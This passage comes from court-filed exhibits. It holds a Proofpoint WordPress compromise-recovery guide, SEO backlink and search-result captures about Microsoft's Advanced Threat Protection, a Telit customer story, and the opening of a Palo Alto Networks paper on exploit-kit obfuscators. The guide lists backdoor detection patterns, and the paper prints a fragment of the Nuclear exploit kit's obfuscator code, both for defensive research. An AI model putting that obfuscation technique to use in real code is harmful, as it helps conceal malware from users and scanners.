Should any of the above methods provide a positive indication of the WP site having been compromised, or even raise suspicion of a possible compromise, use multiple Anti–Virus solutions to scan your local system to try to identify whether or not the attack is the result of a compromised machine.

A local compromise can sometimes be the beachhead attackers used to gain access to the WP installation. If this is the case, any kind of malware may be present on the machine, including backdoors, keyloggers, screen or memory scrapers, etc, which may be used to monitor any changes you attempt to make from this point on. Thus, it is good practice to ensure your local machine is clean.

### 4.   Backup WordPress

Backup all WordPress files.

If a very recent (non–compromised) backup is available, at this point it may be sufficient to reinstall the WP site from the backup and upgrading the WP version and all Plugins and Themes to the very latest versions.

### 5.   Take Down the WP Site

If there is a strong indication that the site is infected, it may be advisable to take the site down temporarily in order to prevent users from accessing the site and becoming infected as well.

### 6.   Update the WP Site

Update the WP installation to the latest version, including all plugins and themes. This is important to try and eliminate any vulnerability that may have been used to breach the site's security.  Another option would be to re–install the WP core from a clean .zip file and then run the update tool. Ensure you have the site backed–up before you do this.

### 7.   Update Access Controls

If the site has been compromised, or if there is any suspicion it has been compromised, it is very important that ALL access controls be updated.

    a.   Change ALL Passwords

        i.   Wordpress, especially admin and editor passwords, but even changing ordinary users' passwords is a good idea.

        ii.   CPanel or any other control panel provided by the Webhost

        iii.   FTP

        iv.   SSH

        v.   Pretty much everything and anything that requires a password

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Case 0:20-cv-60416-AMC   Document 3-1 Entered on FLSB Docket 02/26/2020   Page 380 of 726

It is highly recommended that long, hard to guess passwords be selected. Using randomly generated passwords that include both alphanumeric and special characters is a good idea. There are a number of free tools available online, such as Passpack and KeePass, that help generate and manage passwords.

    b.    Check Users:

Check up on all users of the site. For Admins/Editors: DELETE unrecognized accounts. Attackers often create new accounts in order maintain persistence. Hence, anyone that does not require admin or editor permissions should either be deleted or, at the very least, have downgraded permissions.

    c.    Secret Key:

Even after all passwords have been changed, the attacker may still be connected to the system through valid cookies. Therefore, all sessions must be cancelled.

This can be achieved by changing the WP security keys to ensure any active sessions initiated by the attacker will be ended and they will be logged out of the site.

## 8.   Find and Remove Backdoors

At this point, any malicious code and/or files should have been removed; the WP infrastructure (including core, plugins and themes) should have been updated, and ALL access controls, such as passwords should have been updated.

Unfortunately this is not enough to ensure the site is safe. One of the first things attackers do on gaining access is to install backdoors into the system.

Backdoors may include added users accounts, Webshells, or other mechanisms that allow remote access to and control over the site, often simply through a browser. For this reason, they are often installed in locations that survive most updates.

    a.    What to Look for:

Backdoors can be in the form of files uploaded to the system, or tiny scripts included in pre–existing files. Hence, this step can be quite time–consuming and requires a degree of thoroughness in order to ensure that nothing is overlooked.

        i.    Files: These are usually designed to look innocuous or as if they belong where they are, though sometimes they can simply be random filenames. Often, though, these will contain popular plugin or widget filenames such as 'akismet' or others to make the files appear legit. Knowing the legitimate filenames for your plugins, themes, and so on, as well as checking the file extensions will help root out the good from the bad.

        ii.    Scripts: Scripts injected into legitimate files will usually try to hide their true nature by encoding. One of the most common ways to achieve this is by using "eval()" and "base64_decode()" functions. Note that sometimes these can be reversed and may appear as "()lave" or "()edoced_46esab", or may be partially split up, etc. Other things to look for include variables like $a = 'm'.'d5', $y = 'base'.'6'.'4', etc, and of course, random/obfuscated strings.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Case 0:20-cv-60416-XXX   Document 1-24 Entered on FLSB Docket 02/26/2020   Page 30 of 736

  b. Where to Look:
   i. Filesystem
      • Themes (wp-themes/) – It is a good idea to just DELETE inactive themes
      • Plugins (wp-content/plugins/)
      • Content (wp-content/)
      • wp-config.php
      • Uploads Folder
      • Includes Folder (wp-includes/, wp-includes/images, etc)
      • Other (.htaccess/posts/pages/widgets)
   ii. Database
      • Backdoor code can often be obfuscated in both files and databases by placing it in the middle of a large chunk of 'junk' code that is /*commented out */, so searching through this with a text editor that highlights syntax makes the job easier.
   iii. If Root Access is Available
      • Apache
      • Nginx

## 9. Update Access Controls

Once you have identified and removed any backdoors, it is advisable to change ALL passwords a second time.

## 10. Verify

At this point the WP installation should be free of malicious code and interference from malicious parties. It is recommended to take the following steps:

   a. Run the update tool again
   b. Remove any cached files
   c. Run step 2 of this post again, or at least any of the methods that delivered a positive indication of malicious/suspicious code
   d. If problems persist and the site is on a shared hosting plan, there is a good chance the server has been compromised at a lower level. In this case it is best to contact the Web Hosting provider and communicate the issue. Depending on their responsiveness, it may be advisable to consider switching Web Hosts.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

**THREAT RESEARCH**

Case 0:20-cv-60416-XXX   Document 1-24   Entered on FLSD Docket 02/26/2020   Page 31 of 726

## 11. Harden the WP Site

If the site was taken down to protect visitors, before putting the site up again, it would be a good idea to harden the site against potential future attacks. The list below provides some actions that can be followed to improve the site's overall security posture:

a.  Never use the default 'admin' username

b.  Leverage a secure password policy (as mentioned in this post)

c.  Make use of SFTP when managing your site

d.  Install an Intrusion Detection System (IDS), such as Tripwire or OSSEC

e.  Install a Web Application Firewall (WAF)

f.  Harden the wp-config.php file by following this tutorial

g.  Leverage a Scanner to frequently check your WP site's security posture

h.  Leverage some of the security Plugins mentioned in this post

i.  Limit themes to popular, well-known themes that are updated regularly (stay away from pirated themes)

j.  Always keep WP and its themes and plugins updated to the latest version. Tools are available to assist with this:

    i.  Automated WP Plugins Update Plugin by Whitefir

k.  Always maintain regular backups of the site



Proofpoint, Inc.
892 Ross Drive, Sunnyvale, CA 94089
Tel: +1 408 517 4710
www.proofpoint.com

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

**THREAT RESEARCH**

Case 0:20-cv-60416-AMC   Document 3-25 Entered on FLSD Docket 02/26/2020   Page 383 of

# EXHIBIT 23

**Backlink profile for https://products.office.com/en-us/exchange/advance-threat-protection**

Exact URL

| URL rating | Domain rating | Backlinks | Referring domains |
|---|---|---|---|
| 41 | 92 | 1,045 | 229 |
| | | 80% dofollow | 83% dofollow |

Top 100 backlinks | Top 5 anchors | Top 5 pages | One link per domain

| Referring page | DR | UR | Domains | Traffic | Anchor and backlink |
|---|---|---|---|---|---|
| Stopping ransomware where it counts: Protecting your data with Controlled folder access - Microsoft Security | 96 | 32 | 81 | 0.02 | customers. https://products.office.com/en-us/exchange/online-email-threat-protection?ocid=cx-blog-mmpc helps secure mailboxes against email attacks by blocking emails with |
| www.microsoft.com/security/blog/2017/10/23/stopping-ransomware-where-it-counts-protecting-your-data-with-controlled-folder-access/ | | | | | products.office.com/en-us/exchange/online-email-threat-protection?ocid=cx-blog-mmpc |
| EN   WORDPRESS | | | | | 301  products.office.com/en-us/exchange/advance-threat-protection |
| | | | | | CONTENT |
| Microsoft Office 365 Customers Get Protection Against Malicious Macros | 85 | 24 | 23 | 0.83 | Defender shares its detections of documents with malicious macros with https://products.office.com/en-us/exchange/online-email-threat-protection email security service, which prevents the files from reaching customers |
| www.bleepingcomputer.com/news/security/microsoft-office-365-customers-get-protection-against-malicious-macros/ | | | | | products.office.com/en-us/exchange/online-email-threat-protection |
| EN | | | | | 301  products.office.com/en-us/exchange/advance-threat-protection |
| | | | | | CONTENT |
| How To Spot a Phishing Email [2019 Update] - Copeland Technology Solutions | 28 | 21 | 24 | 5 | Use the Tools Available: https://products.office.com/en-us/exchange/online-email-threat-protection: use tools like these to stay as secure as |
| www.copelanddata.com/blog/how-to-spot-phishing-emails/ | | | | | products.office.com/en-us/exchange/online-email-threat-protection |
| EN   WORDPRESS | | | | | 301  products.office.com/en-us/exchange/advance-threat-protection |
| | | | | | CONTENT |
| Office 365 Advanced Threat Protectioni Safe Links - Link Decoder | 7 | 20 | 29 | 100 | Click https://products.office.com/en-us/exchange/online-email-threat-protection to learn more about Office 365 Advanced Threat Protection. |
| www.o365atp.com/ | | | | | products.office.com/en-us/exchange/online-email-threat-protection |
| | | | | | 301  products.office.com/en-us/exchange/advance-threat-protection |
| | | | | | CONTENT |
| Microsoft announces new Windows Defender Advanced Threat Protection (but there's a catch) - TechRepublic | 88 | 20 | 13 | 0.00 | will complement and support other security systems from Microsoft, including https://products.office.com/en-us/exchange/online-email-threat-protection and Microsoft Advanced Threat Analytics . |
| www.techrepublic.com/article/microsoft-announces-new-windows-defender-advanced-threat-protection-but-theres-a-catch/ | | | | | products.office.com/en-us/exchange/online-email-threat-protection |
| EN | | | | | |
| How to Choose Office 365 Business vs Enterprise Licensing | 41 | 19 | 12 | 347 | https://products.office.com/en-us/exchange/online-email-threat-protection: $2.00 user/month (BE, BP, E1, E3) |
| www.knowledgeware.com/blog/office-365-business-vs-enterprise | | | | | products.office.com/en-us/exchange/online-email-threat-protection |
| EN | | | | | 301  products.office.com/en-us/exchange/advance-threat-protection |
| Office 365 - Providing Your Users Visual Cues About Email Safety - Perficient Blogs | 73 | 18 | 12 | 4.3 | Another feature, related to HTML links and attachments, is " https://products.office.com/en-us/exchange/online-email-threat-protection " which is part of the E5 license or avail |
| blogs.perficient.com/2016/04/04/office-365-providing-your-users-visual-cues-about-email-safety/ | | | | | products.office.com/en-us/exchange/online-email-threat-protection |
| EN   WORDPRESS | | | | | 301  products.office.com/en-us/exchange/advance-threat-protection |
| | | | | | CONTENT |
| Microsoft Turns on Its Advanced Threat Protection Service for E-Mail -- Redmondmag | 75 | 16 | 6 | 0.00 | Microsoft's https://products.office.com/en-us/exchange/online-email-threat-protection (ATP) solution, an Exchange Online e-mail security feature, went live |
| redmondmag.com/articles/2015/06/05/microsoft-advanced-threat-protection.aspx | | | | | |
| Don't be a victim: How to stop ransomware attacks before they start | 76 | 15 | 3 | 91 | https://products.office.com/en-us/exchange/online-email-threat-protection, formerly called Exchange Online Advanced Threat Protection, is another |
| techgenix.com/stop-ransomware-attacks/ | | | | | products.office.com/en-us/exchange/online-email-threat-protection |
| EN   WORDPRESS | | | | | |
| Windows Admins - | 18 | 15 | 3 | 0.00 | attacks is expected to increase. To help mitigate this trend, https://products.office.com/en-us/exchange/advance-threat-protection has a cloud-based email filtering service wit capabilities. |
| windowsadmins.com/ | | | | | products.office.com/en-us/exchange/advance-threat-protection |
| EN   WORDPRESS | | | | | |

May from Ahrefs

Hello there!

Do you have any questions about what you see on this page?

I'll be right here if you need any assistance! :)

Write a reply...

Case 0:20-cv-60416-AMC   Document 3-1   Entered on FLSD Docket 02/26/2020   Page 385 of 726

# EXHIBIT 24



purchase microsoft advanced threat protection

Q All    ⊘ Shopping    📰 News    🖼 Images    ▶ Videos    ⋮ More        Settings    Tools

About 21,800,000 results (0.37 seconds)

### Advanced Threat Protection | Protect Your Business
[Ad] go.crowdstrike.com/free-trial ▼
Start Your Free Trial and See How CrowdStrike Outperforms Traditional **Threat** Detection. Cloud Native
Security. Get Started for Free. For Business & Enterprise. Stop Malware & Breaches.

### Advanced Threat Protection | Redefine Your Suite Security | avanan.com
[Ad] www.avanan.com/Enterprise/Security ▼
**Protect** against phishing scams, malware & more for cloud email, messaging & file sharing. Avanan
deploys with one click and automates your ongoing security. Get started today! No Configuration. Cloud
Infrastructure. One License. Malware Sandboxing. Antivirus. Regulatory Compliance.

### IRONSCALES | Human & Machine Solution
[Ad] www.ironscales.com/ ▼
It only takes 82 seconds on average before a phishing attack can impact your organization. Feedback
loops between humans & machines are essential for a rapid phishing response. Phishing Detection.
BEC **Protection**. Anti-Phishing **Protection**. Peer2Peer Intelligence. Rapid Incident Response.

### Advanced email threat protection – Microsoft 365 - Microsoft Office
https://products.office.com/en-us/exchange/advance-threat-protection ▼
With **Advanced Threat Protection**, you can secure your email service against sophisticated ...
comprehensive protection by leveraging trillions of signals from the **Microsoft** Intelligent ..... How to **buy**
Office 365 **Advanced Threat Protection** Plan 1:.

| People also ask | |
| --- | --- |
| What is Microsoft advanced threat protection? | ⌄ |
| How do I turn off advanced threat protection? | ⌄ |
| Does Office 365 e3 include advanced threat protection? | ⌄ |
| What is Advanced Threat Protection Sophos? | ⌄ |

*Feedback*

### Office 365 Advanced Threat Protection Service Description | Microsoft ...
https://docs.microsoft.com/.../office-365-advanced-threat-protection-service-descriptio... ▼
Aug 2, 2019 - Office 365 ATP can be enabled to protect **Exchange Online** cloud-hosted ... To **buy**
Office 365 **Advanced Threat Protection**, see Office 365 ...
Threat Trackers · Exchange Online Protection · Attack Simulator in Office 365

### Office 365 Advanced Threat Protection | Microsoft Docs
https://docs.microsoft.com/en-us/office365/securitycompliance/office-365-atp ▼
Mar 27, 2019 - Office 365 **Advanced Threat Protection** includes safe attachments, safe ... you can
**purchase** ATP Plan 1 or ATP Plan 2 as an add-on to certain ...
Office 365 Advanced Threat ... · Office 365 ATP Safe Links · ATP Safe Attachments

### Exchange Online Advanced Threat Protection is now available ...
https://www.microsoft.com/.../microsoft.../exchange-online-advanced-threat-protectio... ▼
Jun 1, 2015 - **Exchange Online Advanced Threat Protection** is now available ... You can also
**purchase** ATP through Volume Licensing and Cloud Solution ...

# EXHIBIT 25


This site uses cookies for analytics, personalized content and ads. By continuing to browse this site, you agree to this use.  Learn more



IoT company streamlines security to help it navigate dynamic business environment



September 24, 2018                                    Print

Headquartered in London, Telit enables customers all over the world to design and implement Internet of Things solutions, while the company's IT team works hard to safeguard data and integrate acquired businesses. Telit recently upgraded to Microsoft 365 E5, adding Enterprise Mobility + Security to its existing Office 365 and Windows 10 deployments. Now, employees stay productive on the move, and the security team has a set of integrated tools to help protect more than 1,000 users efficiently.

**Customer**
Telit

**Products and Services**
Azure Active Directory
Azure Advanced Threat Protection
Cloud App Security
Microsoft 365
Microsoft Defender Advanced Threat Protection
Office 365 Advanced Threat Protection P1
Windows 10

**Industry**
Professional Services

**Organization Size**
Large (1,000 - 9,999 employees)

**Country**
United Kingdom

**Downloads**
Telit Company Slide

**Share this story**
  

"We no longer have to worry about what security product we'll use. With Microsoft 365, we're covered."

—Itzik Menashe, VP IT and Information Security
Telit

In the past 10 years, the Internet of Things (IoT) has emerged as a way for companies to improve customer experience through connected devices. But for Telit, IoT is nothing new. It has been connecting machines to each other and devices to the internet for more than 20 years—before the term IoT even existed—and today its 1,500 employees support over 7,000 customers with IoT products, software, and services.

Connecting IoT devices, infrastructure, and sensors to the internet increases the number of entry points for cybercriminals. And with prominent attacks to IoT networks making headlines, customers expect Telit to take its own corporate security as seriously as it takes connectivity. Itzik Menashe, the VP of IT and Information Security at Telit, says, "It's about trust. When we take on a large automotive or industrial customer, they audit our internal systems to check that we have the appropriate protection—and it's my job to ensure that we do."

## Business growth through acquisition

In a fast-moving industry, Telit can't afford to stand still. The company has acquired 10 businesses in the past seven years, meaning that the 30-person IT team has had to integrate new employees, devices, and datacenters. "Telit is a dynamic business, and we have to be ready for anything," says Menashe. "Our management team expects companies to be integrated as soon as contracts are signed. And we need security products that help us achieve this."

But Menashe and his team don't have infinite resources. New additions to the company's business portfolio don't always come with a corresponding increase in IT budgets and personnel, meaning the team has to work in more efficient ways to integrate new companies and keep them safe.

## One vendor, simpler coverage

Until recently, Telit used products from different vendors to handle specific security threats. But this approach led to escalating costs, complexity in managing vendor relationships, and lack of integration between products. "We worked with some of the best vendors and software in the industry," says Menashe, "but they sometimes had a high total cost of ownership, and their effectiveness is limited when they don't talk to each other. We couldn't see clearly how our solutions were performing together." And, because security purchases needed signing off by the company's budget-holders, Menashe often had to strategically choose which to deploy and which could be left until the next fiscal year, leading to what he calls "gray areas" of coverage.

Menashe had been monitoring the development of the Microsoft security portfolio, which included the acquisition of several Israeli cybersecurity startup companies that Telit had already worked with. He and his security specialists were looking for a cost-effective solution but also one that was flexible and could seamlessly interoperate with their on-premises workloads. By upgrading to Microsoft 365 Enterprise E5, the team would benefit from adding Enterprise Mobility + Security to its existing Microsoft deployments, which included Microsoft Azure, Windows 10, and Microsoft Office 365. Menashe says, "The choice was relatively simple. Through the E5 license, we found that we could meet our key security requirements at a lower cost and with better incorporation into our existing infrastructure."

## Threat protection, end to end

With Microsoft 365 E5, Telit adds features including Microsoft Cloud App Security (MCAS), Azure Advanced Threat Protection (ATP), and Azure Active Directory (Azure AD) to its existing security portfolio. It uses them in combination with Office 365 Advanced Threat Protection (ATP), Windows Defender Advanced Threat Protection (ATP), and Office 365 Threat Intelligence to provide robust coverage across its services and simplify the way its security team manages environments.

"We use all the features in Office 365 ATP to minimize risks for end users," says Menashe. "Using the anti-phishing capabilities, for example, we can block emails that use the spoofed display name technique, which some of our management team members have been targeted with."

"Through Office 365 Threat Intelligence, our security team reveals insights and identifies actions based on what is happening in our Office 365 environment. It helps us to protect our organization by making it easy to identify, monitor and understand attacks, and we quickly get insights about risks and how they relate to our organization, so we can adjust our safeguards accordingly."

And Telit uses Windows Defender ATP to monitor and detect threats on end-user devices and gain full visibility of the effect of a malicious file. Azure ATP works alongside to visualize the attack timeline. "The biggest advantage of Windows Defender ATP over any other endpoint protection software is that it's already part of the operating system and not a third-party add-in," says Menashe. "We can see where an attachment originated and how it then progressed through a machine and network."

## Smoother for admins and users

The fact that security products in Microsoft 365 integrate with each other helps the information security team at Telit save time, provide a more seamless user experience, and improve protection. Menashe cites the integration between Office 365 ATP and end-user applications like Microsoft Outlook as an example. "When an email is being scanned for malware, Outlook will either update the user to notify them that the email is being scanned or let them read the email while it scans the attachment. This way, users understand how security works behind the scenes and they can get on with their work."

Another example is conditional access according to the risk level associated with a sign-in attempt. "Some of our executives don't want to be asked to provide multi-factor authentication every time they sign in," says Menashe. "So now we can automate when that happens, like when they are not using a managed device or while they are out of office in unsecure areas. Overall, these features of Microsoft 365 reduce barriers to productivity without compromising on security."

## Ready for the future

The information security team at Telit can now better support more than 1,000 global users and several datacenters. And it's ready for whatever comes next. "We no longer have to worry about what security product we'll use. With Microsoft 365, we're covered," says Menashe. And the new features are quick for Telit to deploy, too. Azure ATP took less than a day to go into production, for example.

The team can easily develop a security strategy going forward by using Microsoft Secure Score, which analyzes environments, assigns a score, and outlines security measures to take in priority order. "I can take numbers and actions from Secure Score to management to explain what we're going to do next and how that will improve our level of protection," says Menashe. "It helps us keep on top of security."

Find out more about Telit on Twitter, Facebook, and LinkedIn.

"The choice was relatively simple. Through the E5 license, we found that we could meet our key security requirements at a lower cost and with better incorporation into our existing infrastructure."

—Itzik Menashe, VP IT and Information Security
Telit

◁◁   ◁   1 of 4   ▷

## Similar Stories



TD Bank Group supports a culture of inclusion with assistive technologies



Ellevo automatiza atendimentos com chatbot integrado aos aplicativos de mensagem mais usados do



Abrona accelerates GDPR compliance and increases productivity with Microsoft 365



Northampton Primary Academy Trust empowers staff and students with Office 365

## Follow Microsoft



**What's new**
Surface Pro 6
Surface Laptop 2
Surface Go
Xbox One X
Windows 10 apps
Office apps

**Microsoft Store**
Account profile
Download Center
Microsoft Store support
Returns
Order tracking
Store locations
Buy online, pick up in store
In-store events

**Education**
Microsoft in education
Office for students
Office 365 for schools
Deals for students & parents
Microsoft Azure in education

**Enterprise**
Azure
AppSource
Automotive
Government
Healthcare
Manufacturing
Financial services
Retail

**Developer**
Microsoft Visual Studio
Windows Dev Center
Developer Network
TechNet
Microsoft developer program
Channel 9
Office Dev Center
Microsoft Garage

**Company**
Careers
About Microsoft
Company news
Privacy at Microsoft
Investors
Diversity and inclusion
Accessibility
Security

English (United States)        Contact Microsoft    Privacy & cookies    Terms of use    Trademarks    Safety & eco    About our ads    © Microsoft 2018

Case 0:20-cv-60416-AMC   Document 3-1   Entered on FLSD Docket 02/26/2020   Page 389 of 726

# EXHIBIT 26



🔍 All   🖼 Images   🏷 Shopping   📰 News   ▶ Videos   ⋮ More          Settings   Tools

2 results (0.58 seconds)

[DOC] Speaker Notes
https://o365pp.blob.core.windows.net/.../Office%20365%20ProPlus%20for%20Mac%... ▼
**Ensure hyperlinks in documents are harmless with ATP Safe Links***:. Protect your organization from harmful hyperlinks through ATP Safe Links policies; Create a ...

[DOC] Office 365 ProPlus Overview for Decision Makers Speaker Notes
https://o365pp.blob.core.windows.net/.../Office%20365%20ProPlus%20Overview%2... ▼
**Ensure hyperlinks in documents are harmless with ATP Safe Links***:. Protect your organization from harmful hyperlinks through ATP Safe Links policies; Create a ...

Case 0:20-cv-60416-AMC   Document 3-29   Entered on FLSD Docket 02/26/2020   Page 391 of

# EXHIBIT 27



Your search - **"Ensure hyperlinks in documents are harmless with ATP Safe Links" filetype:ppt** - did not match any documents.

Suggestions:

- Make sure all words are spelled correctly.
- Try different keywords.
- Try more general keywords.
- Try fewer keywords.

### Advanced Email Protection | Try SpamStopsHere Free

[Ad] www.greenviewdata.com/ ▼   (800) 458-3348

99.5% Spam Blocking, Zero-Hour AntiVirus, Downtime Protection, 24/7 Live Support. Free 30-Day Trial. No Xtra Hardware/Software. Highlights: In Service Since 1980, 24/7 Live Support Available.
Get A Free Trial · Email Hosting · Email Encryption · Pricing Plans

### How to Fix Insert Hyperlink | For Windows 10, 8, 7 & Vista

[Ad] www.windowstechies.com/ ▼

Follow These Easy Steps Now. Takes Only 2 Minutes. (Recommended) Fix Your PC with WindowsTechies®. Fully Safe. Free Diagnosis. Verified And Fully Safe. Highlights: We Make Microsoft Windows Easy For You, We Help You Improve Your Windows Experience.
About Us · Contact Us · Fix Errors · Blog Center · Products Available · FAQs

### Advanced Threat Protection | Search Advanced Threat Protection

[Ad] www.izito.com/Find/Quality_Results ▼

Get Advanced Threat Protection. Discover Millions Of Results Here. Discover Quality Results. Find Related Results Now. 100+ Qualitative Results. Powerful and Easy to Use. Get More Related Info. Explore the Best Info Now. Types: News, Video, Images, Web, Wiki.
Find Fast · Search Efficiently · Better Results · Search Smarter

Case 0:20-cv-60416-AMC Document 2-1 Entered on FLSD Docket 02/26/2020 Page 393 of 726

# EXHIBIT 28

# Next Generation Of Exploit Kit Detection By Building Simulated Obfuscators

Tongbo Luo[*]
Palo Alto Networks Inc
4401 Great America Pkwy
Santa Clara, CA 95054
tluo@paloaltonetworks.com

Xing Jin
Palo Alto Networks Inc
4401 Great America Pkwy
Santa Clara, CA 95054
xijin@paloaltonetworks.com

## ABSTRACT

Recently, drive-by downloads attacks have almost reached epidemic levels, and exploit-kit is the propulsion to signify the process of malware delivery. One of the key techniques used by exploit-kit to avoid firewall detection is obfuscating malicious JavaScript program. There exists an engine in each exploit kit, aka obfuscator, which transforms the malicious code to obfuscated code.

In this paper, we tracked and collected over 20000 obfuscated JavaScript samples of 5 exploit kit families from 2014 to 2016. This research is the first attempt to approach the problem from a different angle: reverse engineering the obfuscator from obfuscated samples. We leverage JavaScript normalization technique and hierarchical cluster algorithm to minimize the manual effort when reproducing the obfuscator. We utilize agglomerative approach to measure the proper threshold to best classify samples by their obfuscator version and variant. We implement our design to cluster normalized samples, and illustrate the life cycle of obfuscator version and variant for all 5 families. This is the first work that depicts the timeline of exploit kit from the perspective of the evolution of its obfuscator. We derive patterns on how obfuscator evolved and tend to predict the next obfuscator variation. We share our research with the larger security community through open source the project release, aiming to provide better protection of the cyber-world[1].

## Keywords

Exploit Kit, JavaScript Obfuscation, JavaScript Normalization, Obfuscator

## 1. INTRODUCTION

The cyber space is the number one source of malware (a term that combines "malicious" and "software"), and the majority of these malware threats come from what is called a drive-by download. Attackers developed a toolkit, called exploit kit, that automates the exploitation of client-side vulnerabilities, usually targeting browsers and plugins that a website can access through the browser exposed APIs. Exploit kit packaged all functionalities in 5 stages : entry point, distribution, exploit, infection, and execution, to launch a

web attack. The earliest hack toolkit, named Mpack, was available in the crimeware market in 2006. From then on, exploit kits have become the most popular method for cybercriminals to compromise hosts and to leverage those hosts for various methods of profit. Exploit kit can cost anywhere between free to thousands of dollars in underground market. Typically, relatively unsophisticated kit may cost US$500 per month. Licenses for advanced kits have been reported to cost as much as $10,000 per month. Currently, there are 70 different exploit kits in the wild that take advantage of more than a hundred vulnerabilities [1].

A key characteristic of an exploit kit is the heavily obfuscation of their malicious JavaScript code. By virtue of the dynamic feature of JavaScript language (e.g. code within an eval, dynamic type dependent object creation), exploit kit regularly changes the obfuscation techniques to evade detection and/or analysis. Therefore, the world of exploit kits is an ever-changing one, and if people happen to look away even just for one month, they will come back to find that almost everything has changed. This arguably makes detection of exploit kits most pressing problem.

We observed that prior studies focused on extracting features (e.g. static characteristics [2, 3, 4], dynamic behaviors [5, 6] or a combination of both of them [7] ) to separate benign and malicious JavaScript code. They usually leveraged machine learning algorithms to train a model based on these features on huge sample set, and adopt the model to classify a sample to either malicious or benign. Till recently, security researchers proposed approaches to detect the variant of an existing exploit kit samples [8, 9, 10]. We have seen lots of articles or blogs [11, 12, 13, 14] that share their analysis on the obfuscation techniques, but they only focus on analyzing the specific techniques utilized by the exploit kits.

In this paper, we approach the problem from a different angle: reverse engineering the obfuscator from the obfuscated script samples. Of the massive number of samples we collected over 2 years, we propose a novel clustering approach to identify the evolution of the obfuscator variant, and significantly reduce the manual effort to reverse engineering the obfuscator to an affordable level.

Our work is motivated by the benefit of reverse-engineering the obfuscator. Purchasing an obfuscator utilized by the real exploit kit is extremely expensive in the underground market, and it may even involve legal issues. This prevents security community from understanding the other side of the obfuscated script. Rebuilding the obfuscator from samples can solve the difficulty of acquiring one in the wild. The rebuilt

---

[*]Sr Staff Security Researcher in IPS Team.
[1] Source Code at
https://github.com/irobert-tluo/rebuild_obfuscator.git
Online Detection Tool at http://www.jsDarwin.com

obfuscators can solve the shortage of exploit kit samples as well. Nearly every exploit kit leverages various evasion techniques (e.g. IP cloaking, DGA), which makes consistently sample collecting quite challenging. Using rebuilt obfuscators, we can generate unlimited number of samples.

Reverse engineering an obfuscator is challenging. Unlike develop an arbitrary obfuscator, reverse engineering an obfuscator is more time consuming since we have to manually analyze massive samples to derive how the obfuscator works. However, due to the special functionality of the obfuscator, which is designed to conceal the purpose and logic of the code, the obfuscator deliberately obfuscates the malicious script each time it is requested. Moreover, multiple obfuscator variants are active in the wild at the same time. As a result, from the collected samples, it is extremely difficult to distinguish which obfuscator variant generates a given sample. A feasible approach is required to identify an obfuscator variant and cluster samples in a way that the samples within the same group are generated by the same obfuscator variant. In addition, the samples in each cluster should be as similar as possible to facilitate manual reverse engineering of the obfuscator.

This paper makes the following contributions: (1) *New Angle*: Based on our knowledge, this research is the first attempt to systematically rebuild the obfuscator from the obfuscated samples. (2) *New Techniques*: We developed a new evolution-based hierarchical clustering algorithm to identify obfuscator variants. (3) *Implementation*: We implemented our design and shared our implementation with the security community.

## 2. BACKGROUND

We begin with an example of obfuscator and obfuscation techniques that gives a high-level overview of how obfuscator works.

### 2.1 Obfuscation Techniques

Examining the samples we collected in detail, we find that there are three major obfuscation techniques used by obfuscator. (1) Randomization Obfuscation: An obfuscator may randomly insert or modify some elements of the JavaScript program without changing the semantics of the codes, such as whitespace, comments, variable names, function names randomization. They may also change the order of function declarations. (2) Constant Value Obfuscation: An obfuscator utilizes the bracket notation to access a property of an object (e.g. String["fromCharCode"]). However, they construct the property names at runtime as the computation result of other variables or constants. String manipulation is the most common technique (e.g. s="from" + "Char" + "Code"; String[s]; ). (3) Encoding Obfuscation: An obfuscator may encode malicious payloads into escaped ASCII characters, unicode, hexadecimal format or even customized representation. They put the encoded malicious payloads and implement the decoding algorithm as the part of the script. The script unpack the encoded payloads and launch the attack.

### 2.2 Obfuscator

To evade manual analysis, browser emulators, or antivirus detection, adversaries craft their code while remaining effective at exploiting regular users. This keeps the malicious pages for a longer period of time "under the radar" before

adding to the public blacklists [8]. Therefore, all exploit kits implement an obfuscator, which leverage obfuscation techniques to deliberately hide the malicious JavaScript program.



Figure 1: Overview of Obfuscator.

From the released source code of exploit kits, we observe that the design of an obfuscator involves two components: template and engine. Since obfuscators need a convenient way to generate HTML and JavaScript dynamically, they rely on a template to define the static parts of the desired output, as well as, special syntax describing how dynamic content will be integrated. The engine construct the dynamic content (usually a randomized data) and feed it to the template to generate the output. Figure 2 illustrates a snippet of obfuscator code from Nuclear exploit kit [15, 16]. One of the key step to reverse engineering an obfusca-

```
for ($i=0; $i<65; $i++) {
    $varp[$i] = GetRandomString(mt_rand(5, 8));
}
function js_crypt($str) {
    global $varp, $r_int;
    $ra_f_str = based64_encode(GetRandomString(mt_rand(100, 800)));
    // FILL TEMPLATE
    $jscode = 'function '.$varp[11].'('.$varp[11].
    ')('.$varp[11].' = ' . $varp[11].'.join("");'
    // ...
    'if('.$varp[40].'.length > 0) { eval ('.$varp[40].')}'
    // ...
}
```

Figure 2: Nuclear Exploit Kit Obfuscator Example.

tor is to identity which part of the sample are generated by the template and which part are generated by the engine. In order to perform the previous step, we need to distinguish whether two samples come from the same variants. In the rest of the paper, we will discuss the method to automatically retrieve the obfuscator template and reduce the number of samples in order to manually reverse-engineering an obfuscator engine.

Figure 1 only shows one level of the obfuscation iterations. An exploit kit normally obfuscates the payload several times. For example, the output of the first level obfuscation will be used as the input of the second level. In this work, we will only demonstrate how to reverse engineering the first level,

however our approach can be applied to any level in theory since the obfuscator design at each level is quite similar to each other.

## 2.3  Challenges

We face several challenges in reverse-engineering the obfuscator:

**C1: Code Complexity.** Each obfuscated page has more than hundread lines of code, which also contain a lot of random variables inside. This challenge makes it very hard to identity which part of the sample are generated by template and which part are generated by the engine.

**C2: Data Complexity.** Our sample data set contains more than 20,000 samples over 2 years period. There also may be different versions or variants mixed together at the same time. This challenges make it even harder to do the reverse engineering for the obfuscator.

Despite all the challenges involve, reverse engineering obfuscator would be great help to the researcher/engineer to better understanding and track the evolution of exploit kit

## 3.  OUR APPROACH

In this section, we discuss how we leverage the normalization technique and clustering algorithm to minimize the manual effort when reproducing obfuscators from samples.

### 3.1  Overview

